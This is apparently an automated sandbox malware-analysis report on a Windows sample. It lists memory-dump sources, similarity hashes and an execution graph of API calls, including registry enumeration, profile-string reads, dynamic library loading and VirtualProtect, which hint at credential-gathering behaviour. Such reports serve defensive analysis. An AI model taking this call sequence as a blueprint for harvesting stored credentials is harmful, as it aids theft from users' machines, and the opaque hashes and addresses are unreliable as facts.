                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: free$memcpy$mallocstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3669619086-0
                                                                                                                                                              • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                                                              • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                              • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                                                              • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                              APIs
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                              • malloc.MSVCRT ref: 00417407
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                              • free.MSVCRT ref: 00417425
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2605342592-0
                                                                                                                                                              • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                                              • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                              • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                                              • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1961120804-0
                                                                                                                                                              • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                                                              • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                              • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                                                              • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:2.4%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:20%
                                                                                                                                                              Signature Coverage:0.5%
                                                                                                                                                              Total number of Nodes:866
                                                                                                                                                              Total number of Limit Nodes:21
                                                                                                                                                              execution_graph 33875 40fc40 70 API calls 34048 403640 21 API calls 33876 427fa4 42 API calls 34049 412e43 _endthreadex 34050 425115 76 API calls __fprintf_l 34051 43fe40 133 API calls 33879 425115 83 API calls __fprintf_l 33880 401445 memcpy memcpy DialogBoxParamA 33881 440c40 34 API calls 33883 411853 RtlInitializeCriticalSection memset 33884 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34057 40a256 13 API calls 34059 432e5b 17 API calls 34061 43fa5a 20 API calls 33886 401060 41 API calls 34064 427260 CloseHandle memset memset 32943 410c68 FindResourceA 32944 410c81 SizeofResource 32943->32944 32947 410cae 32943->32947 32945 410c92 LoadResource 32944->32945 32944->32947 32946 410ca0 LockResource 32945->32946 32945->32947 32946->32947 34066 405e69 14 API calls 33891 433068 15 API calls __fprintf_l 34068 414a6d 18 API calls 34069 43fe6f 134 API calls 33893 424c6d 15 API calls __fprintf_l 34070 426741 19 API calls 33895 440c70 17 API calls 33896 443c71 44 API calls 33899 427c79 24 API calls 34073 416e7e memset __fprintf_l 33902 43f400 15 API calls 33903 42800b 47 API calls 33904 425115 82 API calls __fprintf_l 34076 41960c 61 API calls 33905 43f40c 122 API calls __fprintf_l 33908 411814 InterlockedCompareExchange RtlDeleteCriticalSection 33909 43f81a 20 API calls 33911 414c20 memset memset 33912 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34080 414625 18 API calls 34081 404225 modf 34082 403a26 strlen WriteFile 34084 40422a 12 API calls 34088 427632 memset memset memcpy 34089 40ca30 59 API calls 34090 404235 26 API calls 33914 425115 76 API calls __fprintf_l 34091 425115 77 API calls __fprintf_l 34093 44223a 38 API calls 33920 43183c 112 API calls 34094 44b2c5 _onexit __dllonexit 34099 42a6d2 memcpy __allrem 33922 405cda 65 API calls 34107 43fedc 138 API calls 34108 4116e1 16 API calls __fprintf_l 33925 4244e6 19 API calls 33927 42e8e8 127 API calls __fprintf_l 33928 4118ee RtlLeaveCriticalSection 34113 43f6ec 22 API calls 33930 425115 119 API calls __fprintf_l 32933 410cf3 EnumResourceNamesA 34116 4492f0 memcpy memcpy 34118 43fafa 18 API calls 34120 4342f9 15 API calls __fprintf_l 33931 4144fd 19 API calls 34122 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34123 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34126 443a84 _mbscpy 34128 43f681 17 API calls 33934 404487 22 API calls 34130 415e8c 16 API calls __fprintf_l 33938 411893 RtlDeleteCriticalSection __fprintf_l 33939 41a492 42 API calls 34134 403e96 34 API calls 34135 410e98 memset SHGetPathFromIDList SendMessageA 33941 426741 109 API calls __fprintf_l 33942 4344a2 18 API calls 33943 4094a2 10 API calls 34138 4116a6 15 API calls __fprintf_l 34139 43f6a4 17 API calls 34140 440aa3 20 API calls 34142 427430 45 API calls 33946 4090b0 7 API calls 33947 4148b0 15 API calls 33949 4118b4 RtlEnterCriticalSection 33950 4014b7 CreateWindowExA 33951 40c8b8 19 API calls 33953 4118bf RtlTryEnterCriticalSection 34147 42434a 18 API calls __fprintf_l 34149 405f53 12 API calls 33961 43f956 59 API calls 33963 40955a 17 API calls 33964 428561 36 API calls 33965 409164 7 API calls 34153 404366 19 API calls 34157 40176c ExitProcess 34160 410777 42 API calls 33970 40dd7b 51 API calls 33971 425d7c 16 API calls __fprintf_l 34162 43f6f0 25 API calls 34163 42db01 22 API calls 33972 412905 15 API calls __fprintf_l 34164 403b04 54 API calls 34165 405f04 SetDlgItemTextA GetDlgItemTextA 34166 44b301 ??3@YAXPAX 34169 4120ea 14 API calls 3 library calls 34170 40bb0a 8 API calls 34172 413f11 strcmp 33976 434110 17 API calls __fprintf_l 33978 425115 108 API calls __fprintf_l 34173 444b11 _onexit 33980 425115 76 API calls __fprintf_l 33983 429d19 10 API calls 34176 444b1f __dllonexit 34177 409f20 _strcmpi 33985 42b927 31 API calls 34180 433f26 19 API calls __fprintf_l 34181 44b323 FreeLibrary 34182 427f25 46 API calls 34183 43ff2b 17 API calls 34184 43fb30 19 API calls 33992 414d36 16 API calls 33994 40ad38 7 API calls 34186 433b38 16 API calls __fprintf_l 33866 44b33b 33867 44b344 ??3@YAXPAX 33866->33867 33868 44b34b 33866->33868 33867->33868 33869 44b354 ??3@YAXPAX 33868->33869 33870 44b35b 33868->33870 33869->33870 33871 44b364 ??3@YAXPAX 33870->33871 33872 44b36b 33870->33872 33871->33872 33873 44b374 ??3@YAXPAX 33872->33873 33874 44b37b 33872->33874 33873->33874 33998 426741 21 API calls 33999 40c5c3 125 API calls 34001 43fdc5 17 API calls 34187 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34004 4161cb memcpy memcpy memcpy memcpy 32948 44b3cf 32949 44b3e6 32948->32949 32959 44b454 32948->32959 32949->32959 32961 44b40e GetModuleHandleA 32949->32961 32950 44b45d GetModuleHandleA 32954 44b467 32950->32954 32951 44b49a 32974 44b49f 32951->32974 32954->32954 32956 44b487 GetProcAddress 32954->32956 32954->32959 32955 44b405 32955->32954 32957 44b428 GetProcAddress 32955->32957 32955->32959 32956->32959 32958 44b435 VirtualProtect 32957->32958 32957->32959 32958->32959 32960 44b444 VirtualProtect 32958->32960 32959->32950 32959->32951 32959->32954 32960->32959 32962 44b417 32961->32962 32970 44b454 32961->32970 32993 44b42b GetProcAddress 32962->32993 32964 44b41c 32968 44b428 GetProcAddress 32964->32968 32964->32970 32965 44b45d GetModuleHandleA 32972 44b467 32965->32972 32966 44b49a 32967 44b49f 775 API calls 32966->32967 32967->32966 32969 44b435 VirtualProtect 32968->32969 32968->32970 32969->32970 32971 44b444 VirtualProtect 32969->32971 32970->32965 32970->32966 32970->32972 32971->32970 32972->32970 32973 44b487 GetProcAddress 32972->32973 32973->32970 32975 444c4a 32974->32975 32976 444c56 GetModuleHandleA 32975->32976 32977 444c68 __set_app_type __p__fmode __p__commode 32976->32977 32979 444cfa 32977->32979 32980 444d02 __setusermatherr 32979->32980 32981 444d0e 32979->32981 32980->32981 33002 444e22 _controlfp 32981->33002 32983 444d13 _initterm __getmainargs _initterm 32984 444d6a GetStartupInfoA 32983->32984 32986 444d9e GetModuleHandleA 32984->32986 33003 40cf44 32986->33003 32990 444dcf _cexit 32992 444e04 32990->32992 32991 444dc8 exit 32991->32990 32992->32951 32994 44b454 32993->32994 32995 44b435 VirtualProtect 32993->32995 32997 44b45d GetModuleHandleA 32994->32997 32998 44b49a 32994->32998 32995->32994 32996 44b444 VirtualProtect 32995->32996 32996->32994 33001 44b467 32997->33001 32999 44b49f 775 API calls 32998->32999 32999->32998 33000 44b487 GetProcAddress 33000->33001 33001->32994 33001->33000 33002->32983 33054 404a99 LoadLibraryA 33003->33054 33005 40cf60 33040 40cf64 33005->33040 33061 410d0e 33005->33061 33007 40cf6f 33065 40ccd7 ??2@YAPAXI 33007->33065 33009 40cf9b 33079 407cbc 33009->33079 33014 40cfc4 33097 409825 memset 33014->33097 33015 40cfd8 33102 4096f4 memset 33015->33102 33020 40d181 ??3@YAXPAX 33022 40d1b3 33020->33022 33023 40d19f DeleteObject 33020->33023 33021 407e30 _strcmpi 33024 40cfee 33021->33024 33126 407948 free free 33022->33126 33023->33022 33026 40cff2 RegDeleteKeyA 33024->33026 33027 40d007 EnumResourceTypesA 33024->33027 33026->33020 33029 40d047 33027->33029 33030 40d02f MessageBoxA 33027->33030 33028 40d1c4 33127 4080d4 free 33028->33127 33032 40d0a0 CoInitialize 33029->33032 33107 40ce70 33029->33107 33030->33020 33124 40cc26 strncat memset RegisterClassA CreateWindowExA 33032->33124 33034 40d1cd 33128 407948 free free 33034->33128 33036 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33125 40c256 PostMessageA 33036->33125 33040->32990 33040->32991 33041 40d061 ??3@YAXPAX 33041->33022 33044 40d084 DeleteObject 33041->33044 33042 40d09e 33042->33032 33044->33022 33046 40d0f9 GetMessageA 33047 40d17b CoUninitialize 33046->33047 33048 40d10d 33046->33048 33047->33020 33049 40d113 TranslateAccelerator 33048->33049 33051 40d145 IsDialogMessage 33048->33051 33052 40d139 IsDialogMessage 33048->33052 33049->33048 33050 40d16d GetMessageA 33049->33050 33050->33047 33050->33049 33051->33050 33053 40d157 TranslateMessage DispatchMessageA 33051->33053 33052->33050 33052->33051 33053->33050 33055 404ac4 GetProcAddress 33054->33055 33057 404ae8 33054->33057 33056 404add FreeLibrary 33055->33056 33058 404ad4 33055->33058 33056->33057 33059 404b13 33057->33059 33060 404afc MessageBoxA 33057->33060 33058->33056 33059->33005 33060->33005 33062 410d17 LoadLibraryA 33061->33062 33063 410d3c 33061->33063 33062->33063 33064 410d2b GetProcAddress 33062->33064 33063->33007 33064->33063 33066 40cd08 ??2@YAPAXI 33065->33066 33068 40cd26 33066->33068 33069 40cd2d 33066->33069 33136 404025 6 API calls 33068->33136 33071 40cd66 33069->33071 33072 40cd59 DeleteObject 33069->33072 33129 407088 33071->33129 33072->33071 33074 40cd6b 33132 4019b5 33074->33132 33077 4019b5 strncat 33078 40cdbf _mbscpy 33077->33078 33078->33009 33138 407948 free free 33079->33138 33081 407e04 33139 407a55 33081->33139 33084 407ddc 33084->33081 33151 407a1f 33084->33151 33085 407a1f malloc memcpy free free 33091 407cf7 33085->33091 33087 407d7a free 33087->33091 33091->33081 33091->33084 33091->33085 33091->33087 33142 40796e 7 API calls 33091->33142 33143 406f30 33091->33143 33093 407e30 33094 407e57 33093->33094 33095 407e38 33093->33095 33094->33014 33094->33015 33095->33094 33096 407e41 _strcmpi 33095->33096 33096->33094 33096->33095 33157 4097ff 33097->33157 33099 409854 33162 409731 33099->33162 33103 4097ff 3 API calls 33102->33103 33104 409723 33103->33104 33182 40966c 33104->33182 33196 4023b2 33107->33196 33113 40ced3 33285 40cdda 7 API calls 33113->33285 33114 40cece 33117 40cf3f 33114->33117 33237 40c3d0 memset GetModuleFileNameA strrchr 33114->33237 33117->33041 33117->33042 33120 40ceed 33264 40affa 33120->33264 33124->33036 33125->33046 33126->33028 33127->33034 33128->33040 33137 406fc7 memset _mbscpy 33129->33137 33131 40709f CreateFontIndirectA 33131->33074 33133 4019e1 33132->33133 33134 4019c2 strncat 33133->33134 33135 4019e5 memset LoadIconA 33133->33135 33134->33133 33135->33077 33136->33069 33137->33131 33138->33091 33140 407a65 33139->33140 33141 407a5b free 33139->33141 33140->33093 33141->33140 33142->33091 33144 406f37 malloc 33143->33144 33145 406f7d 33143->33145 33147 406f73 33144->33147 33148 406f58 33144->33148 33145->33091 33147->33091 33149 406f6c free 33148->33149 33150 406f5c memcpy 33148->33150 33149->33147 33150->33149 33152 407a38 33151->33152 33153 407a2d free 33151->33153 33155 406f30 3 API calls 33152->33155 33154 407a43 33153->33154 33156 40796e 7 API calls 33154->33156 33155->33154 33156->33081 33173 406f96 GetModuleFileNameA 33157->33173 33159 409805 strrchr 33160 409814 33159->33160 33161 409817 _mbscat 33159->33161 33160->33161 33161->33099 33174 44b090 33162->33174 33167 40930c 3 API calls 33168 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33167->33168 33169 4097c5 LoadStringA 33168->33169 33172 4097db 33169->33172 33171 4097f3 33171->33020 33172->33169 33172->33171 33181 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33172->33181 33173->33159 33175 40973e _mbscpy _mbscpy 33174->33175 33176 40930c 33175->33176 33177 44b090 33176->33177 33178 409319 memset GetPrivateProfileStringA 33177->33178 33179 409364 WritePrivateProfileStringA 33178->33179 33180 409374 33178->33180 33179->33180 33180->33167 33181->33172 33192 406f81 GetFileAttributesA 33182->33192 33184 409675 33185 4096ee 33184->33185 33186 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33184->33186 33185->33021 33193 409278 GetPrivateProfileStringA 33186->33193 33188 4096c9 33194 409278 GetPrivateProfileStringA 33188->33194 33190 4096da 33195 409278 GetPrivateProfileStringA 33190->33195 33192->33184 33193->33188 33194->33190 33195->33185 33287 409c1c 33196->33287 33199 401e69 memset 33326 410dbb 33199->33326 33202 401ec2 33356 4070e3 strlen _mbscat _mbscpy _mbscat 33202->33356 33203 401ed4 33341 406f81 GetFileAttributesA 33203->33341 33206 401ee6 strlen strlen 33208 401f15 33206->33208 33210 401f28 33206->33210 33357 4070e3 strlen _mbscat _mbscpy _mbscat 33208->33357 33342 406f81 GetFileAttributesA 33210->33342 33212 401f35 33343 401c31 33212->33343 33215 401f75 33355 410a9c RegOpenKeyExA 33215->33355 33217 401c31 7 API calls 33217->33215 33218 401f91 33219 402187 33218->33219 33220 401f9c memset 33218->33220 33222 402195 ExpandEnvironmentStringsA 33219->33222 33223 4021a8 _strcmpi 33219->33223 33358 410b62 RegEnumKeyExA 33220->33358 33367 406f81 GetFileAttributesA 33222->33367 33223->33113 33223->33114 33225 40217e RegCloseKey 33225->33219 33226 401fd9 atoi 33227 401fef memset memset sprintf 33226->33227 33234 401fc9 33226->33234 33359 410b1e 33227->33359 33230 402165 33230->33225 33231 402076 memset memset strlen strlen 33231->33234 33232 4070e3 strlen _mbscat _mbscpy _mbscat 33232->33234 33233 4020dd strlen strlen 33233->33234 33234->33225 33234->33226 33234->33230 33234->33231 33234->33232 33234->33233 33235 406f81 GetFileAttributesA 33234->33235 33236 402167 _mbscpy 33234->33236 33366 410b62 RegEnumKeyExA 33234->33366 33235->33234 33236->33225 33238 40c422 33237->33238 33239 40c425 _mbscat _mbscpy _mbscpy 33237->33239 33238->33239 33240 40c49d 33239->33240 33241 40c512 33240->33241 33242 40c502 GetWindowPlacement 33240->33242 33243 40c538 33241->33243 33388 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33241->33388 33242->33241 33381 409b31 33243->33381 33247 40ba28 33248 40ba87 33247->33248 33252 40ba3c 33247->33252 33391 406c62 LoadCursorA SetCursor 33248->33391 33250 40ba8c 33392 4107f1 33250->33392 33395 403c16 33250->33395 33471 410a9c RegOpenKeyExA 33250->33471 33472 404734 33250->33472 33480 404785 33250->33480 33251 40ba43 _mbsicmp 33251->33252 33252->33248 33252->33251 33483 40b5e5 10 API calls 33252->33483 33253 40baa0 33254 407e30 _strcmpi 33253->33254 33257 40bab0 33254->33257 33255 40bafa SetCursor 33255->33120 33257->33255 33258 40baf1 qsort 33257->33258 33258->33255 33841 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33264->33841 33266 40b00e 33267 40b016 33266->33267 33268 40b01f GetStdHandle 33266->33268 33842 406d1a CreateFileA 33267->33842 33270 40b01c 33268->33270 33271 40b035 33270->33271 33272 40b12d 33270->33272 33843 406c62 LoadCursorA SetCursor 33271->33843 33847 406d77 9 API calls 33272->33847 33275 40b136 33286 40c580 28 API calls 33275->33286 33276 40b042 33277 40b087 33276->33277 33283 40b0a1 33276->33283 33844 40a57c strlen WriteFile 33276->33844 33277->33283 33845 40a699 12 API calls 33277->33845 33280 40b0d6 33281 40b116 CloseHandle 33280->33281 33282 40b11f SetCursor 33280->33282 33281->33282 33282->33275 33283->33280 33846 406d77 9 API calls 33283->33846 33285->33114 33286->33117 33299 409a32 33287->33299 33290 409c80 memcpy memcpy 33291 409cda 33290->33291 33291->33290 33292 409d18 ??2@YAPAXI ??2@YAPAXI 33291->33292 33293 408db6 12 API calls 33291->33293 33294 409d54 ??2@YAPAXI 33292->33294 33296 409d8b 33292->33296 33293->33291 33294->33296 33296->33296 33309 409b9c 33296->33309 33298 4023c1 33298->33199 33300 409a44 33299->33300 33301 409a3d ??3@YAXPAX 33299->33301 33302 409a52 33300->33302 33303 409a4b ??3@YAXPAX 33300->33303 33301->33300 33304 409a63 33302->33304 33305 409a5c ??3@YAXPAX 33302->33305 33303->33302 33306 409a83 ??2@YAPAXI ??2@YAPAXI 33304->33306 33307 409a73 ??3@YAXPAX 33304->33307 33308 409a7c ??3@YAXPAX 33304->33308 33305->33304 33306->33290 33307->33308 33308->33306 33310 407a55 free 33309->33310 33311 409ba5 33310->33311 33312 407a55 free 33311->33312 33313 409bad 33312->33313 33314 407a55 free 33313->33314 33315 409bb5 33314->33315 33316 407a55 free 33315->33316 33317 409bbd 33316->33317 33318 407a1f 4 API calls 33317->33318 33319 409bd0 33318->33319 33320 407a1f 4 API calls 33319->33320 33321 409bda 33320->33321 33322 407a1f 4 API calls 33321->33322 33323 409be4 33322->33323 33324 407a1f 4 API calls 33323->33324 33325 409bee 33324->33325 33325->33298 33327 410d0e 2 API calls 33326->33327 33328 410dca 33327->33328 33329 410dfd memset 33328->33329 33368 4070ae 33328->33368 33330 410e1d 33329->33330 33371 410a9c RegOpenKeyExA 33330->33371 33334 401e9e strlen strlen 33334->33202 33334->33203 33335 410e4a 33336 410e7f _mbscpy 33335->33336 33372 410d3d _mbscpy 33335->33372 33336->33334 33338 410e5b 33373 410add RegQueryValueExA 33338->33373 33340 410e73 RegCloseKey 33340->33336 33341->33206 33342->33212 33374 410a9c RegOpenKeyExA 33343->33374 33345 401c4c 33346 401cad 33345->33346 33375 410add RegQueryValueExA 33345->33375 33346->33215 33346->33217 33348 401c6a 33349 401c71 strchr 33348->33349 33350 401ca4 RegCloseKey 33348->33350 33349->33350 33351 401c85 strchr 33349->33351 33350->33346 33351->33350 33352 401c94 33351->33352 33376 406f06 strlen 33352->33376 33354 401ca1 33354->33350 33355->33218 33356->33203 33357->33210 33358->33234 33379 410a9c RegOpenKeyExA 33359->33379 33361 410b34 33362 410b5d 33361->33362 33380 410add RegQueryValueExA 33361->33380 33362->33234 33364 410b4c RegCloseKey 33364->33362 33366->33234 33367->33223 33369 4070bd GetVersionExA 33368->33369 33370 4070ce 33368->33370 33369->33370 33370->33329 33370->33334 33371->33335 33372->33338 33373->33340 33374->33345 33375->33348 33377 406f17 33376->33377 33378 406f1a memcpy 33376->33378 33377->33378 33378->33354 33379->33361 33380->33364 33382 409b40 33381->33382 33384 409b4e 33381->33384 33389 409901 memset SendMessageA 33382->33389 33385 409b99 33384->33385 33386 409b8b 33384->33386 33385->33247 33390 409868 SendMessageA 33386->33390 33388->33243 33389->33384 33390->33385 33391->33250 33393 410807 33392->33393 33394 4107fc FreeLibrary 33392->33394 33393->33253 33394->33393 33396 4107f1 FreeLibrary 33395->33396 33397 403c30 LoadLibraryA 33396->33397 33398 403c74 33397->33398 33399 403c44 GetProcAddress 33397->33399 33401 4107f1 FreeLibrary 33398->33401 33399->33398 33400 403c5e 33399->33400 33400->33398 33404 403c6b 33400->33404 33402 403c7b 33401->33402 33403 404734 3 API calls 33402->33403 33405 403c86 33403->33405 33404->33402 33484 4036e5 33405->33484 33408 4036e5 27 API calls 33409 403c9a 33408->33409 33410 4036e5 27 API calls 33409->33410 33411 403ca4 33410->33411 33412 4036e5 27 API calls 33411->33412 33413 403cae 33412->33413 33496 4085d2 33413->33496 33421 403ce5 33422 403cf7 33421->33422 33677 402bd1 40 API calls 33421->33677 33542 410a9c RegOpenKeyExA 33422->33542 33425 403d0a 33426 403d1c 33425->33426 33678 402bd1 40 API calls 33425->33678 33543 402c5d 33426->33543 33430 4070ae GetVersionExA 33431 403d31 33430->33431 33561 410a9c RegOpenKeyExA 33431->33561 33433 403d51 33434 403d61 33433->33434 33679 402b22 47 API calls 33433->33679 33562 410a9c RegOpenKeyExA 33434->33562 33437 403d87 33438 403d97 33437->33438 33680 402b22 47 API calls 33437->33680 33563 410a9c RegOpenKeyExA 33438->33563 33441 403dbd 33442 403dcd 33441->33442 33681 402b22 47 API calls 33441->33681 33564 410808 33442->33564 33446 404785 FreeLibrary 33447 403de8 33446->33447 33568 402fdb 33447->33568 33450 402fdb 34 API calls 33451 403e00 33450->33451 33584 4032b7 33451->33584 33460 403e3b 33461 403e73 33460->33461 33462 403e46 _mbscpy 33460->33462 33631 40fb00 33461->33631 33683 40f334 334 API calls 33462->33683 33471->33253 33473 404785 FreeLibrary 33472->33473 33474 40473b LoadLibraryA 33473->33474 33475 40474c GetProcAddress 33474->33475 33478 40476e 33474->33478 33476 404764 33475->33476 33475->33478 33476->33478 33477 404781 33477->33253 33478->33477 33479 404785 FreeLibrary 33478->33479 33479->33477 33481 4047a3 33480->33481 33482 404799 FreeLibrary 33480->33482 33481->33253 33482->33481 33483->33252 33485 4037c5 33484->33485 33486 4036fb 33484->33486 33485->33408 33684 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33486->33684 33488 40370e 33488->33485 33489 403716 strchr 33488->33489 33489->33485 33490 403730 33489->33490 33685 4021b6 memset 33490->33685 33492 40373f _mbscpy _mbscpy strlen 33493 4037a4 _mbscpy 33492->33493 33494 403789 sprintf 33492->33494 33686 4023e5 16 API calls 33493->33686 33494->33493 33497 4085e2 33496->33497 33687 4082cd 11 API calls 33497->33687 33501 408600 33502 403cba 33501->33502 33503 40860b memset 33501->33503 33514 40821d 33502->33514 33690 410b62 RegEnumKeyExA 33503->33690 33505 4086d2 RegCloseKey 33505->33502 33507 408637 33507->33505 33508 40865c memset 33507->33508 33691 410a9c RegOpenKeyExA 33507->33691 33694 410b62 RegEnumKeyExA 33507->33694 33692 410add RegQueryValueExA 33508->33692 33511 408694 33693 40848b 10 API calls 33511->33693 33513 4086ab RegCloseKey 33513->33507 33695 410a9c RegOpenKeyExA 33514->33695 33516 40823f 33517 403cc6 33516->33517 33518 408246 memset 33516->33518 33526 4086e0 33517->33526 33696 410b62 RegEnumKeyExA 33518->33696 33520 4082bf RegCloseKey 33520->33517 33522 40826f 33522->33520 33697 410a9c RegOpenKeyExA 33522->33697 33698 4080ed 11 API calls 33522->33698 33699 410b62 RegEnumKeyExA 33522->33699 33525 4082a2 RegCloseKey 33525->33522 33700 4045db 33526->33700 33528 4088ef 33708 404656 33528->33708 33532 408737 wcslen 33532->33528 33538 40876a 33532->33538 33533 40877a wcsncmp 33533->33538 33535 404734 3 API calls 33535->33538 33536 404785 FreeLibrary 33536->33538 33537 408812 memset 33537->33538 33539 40883c memcpy wcschr 33537->33539 33538->33528 33538->33533 33538->33535 33538->33536 33538->33537 33538->33539 33540 4088c3 LocalFree 33538->33540 33711 40466b _mbscpy 33538->33711 33539->33538 33540->33538 33541 410a9c RegOpenKeyExA 33541->33421 33542->33425 33712 410a9c RegOpenKeyExA 33543->33712 33545 402c7a 33546 402da5 33545->33546 33547 402c87 memset 33545->33547 33546->33430 33713 410b62 RegEnumKeyExA 33547->33713 33549 402d9c RegCloseKey 33549->33546 33550 410b1e 3 API calls 33551 402ce4 memset sprintf 33550->33551 33714 410a9c RegOpenKeyExA 33551->33714 33553 402d28 33554 402d3a sprintf 33553->33554 33715 402bd1 40 API calls 33553->33715 33716 410a9c RegOpenKeyExA 33554->33716 33559 402cb2 33559->33549 33559->33550 33560 402d9a 33559->33560 33717 402bd1 40 API calls 33559->33717 33718 410b62 RegEnumKeyExA 33559->33718 33560->33549 33561->33433 33562->33437 33563->33441 33565 410816 33564->33565 33566 4107f1 FreeLibrary 33565->33566 33567 403ddd 33566->33567 33567->33446 33719 410a9c RegOpenKeyExA 33568->33719 33570 402ff9 33571 403006 memset 33570->33571 33572 40312c 33570->33572 33720 410b62 RegEnumKeyExA 33571->33720 33572->33450 33574 403122 RegCloseKey 33574->33572 33575 410b1e 3 API calls 33576 403058 memset sprintf 33575->33576 33721 410a9c RegOpenKeyExA 33576->33721 33578 403033 33578->33574 33578->33575 33579 4030a2 memset 33578->33579 33581 410b62 RegEnumKeyExA 33578->33581 33582 4030f9 RegCloseKey 33578->33582 33723 402db3 26 API calls 33578->33723 33722 410b62 RegEnumKeyExA 33579->33722 33581->33578 33582->33578 33585 4032d5 33584->33585 33586 4033a9 33584->33586 33724 4021b6 memset 33585->33724 33599 4034e4 memset memset 33586->33599 33588 4032e1 33725 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33588->33725 33590 4032ea 33591 4032f8 memset GetPrivateProfileSectionA 33590->33591 33726 4023e5 16 API calls 33590->33726 33591->33586 33596 40332f 33591->33596 33593 40339b strlen 33593->33586 33593->33596 33595 403350 strchr 33595->33596 33596->33586 33596->33593 33727 4021b6 memset 33596->33727 33728 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33596->33728 33729 4023e5 16 API calls 33596->33729 33600 410b1e 3 API calls 33599->33600 33601 40353f 33600->33601 33602 40357f 33601->33602 33603 403546 _mbscpy 33601->33603 33607 403985 33602->33607 33730 406d55 strlen _mbscat 33603->33730 33605 403565 _mbscat 33731 4033f0 19 API calls 33605->33731 33732 40466b _mbscpy 33607->33732 33611 4039aa 33612 4039ff 33611->33612 33733 40f460 memset memset 33611->33733 33754 40f6e2 33611->33754 33770 4038e8 21 API calls 33611->33770 33614 404785 FreeLibrary 33612->33614 33615 403a0b 33614->33615 33616 4037ca memset memset 33615->33616 33778 444551 memset 33616->33778 33618 4038e2 33618->33460 33682 40f334 334 API calls 33618->33682 33621 40382e 33622 406f06 2 API calls 33621->33622 33623 403843 33622->33623 33624 406f06 2 API calls 33623->33624 33625 403855 strchr 33624->33625 33626 403884 _mbscpy 33625->33626 33627 403897 strlen 33625->33627 33628 4038bf _mbscpy 33626->33628 33627->33628 33629 4038a4 